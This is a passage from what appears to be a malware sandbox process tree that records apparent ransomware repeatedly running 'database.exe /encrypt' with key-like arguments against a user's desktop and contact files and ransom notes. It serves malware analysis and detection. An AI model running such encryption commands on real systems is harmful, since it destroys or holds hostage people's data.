                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4376
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5776
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\ntuser.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6256
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5460
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1332
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\Admin.contact.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7148
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6672
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Contacts\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1020
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3276
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6676
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1380
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\A8TfBlMc-hK4WM9cK.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4676
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AddGroup.mp4.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4240
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AssertExpand.css.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1892
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearCheckpoint.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6156
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearRestore.mpeg3.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:232
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CloseMeasure.ADT.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4512
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\cmd.exe.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6240
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CmqL7QFf-57e8zezN.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7012
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CompleteFormat.mid.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4756
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
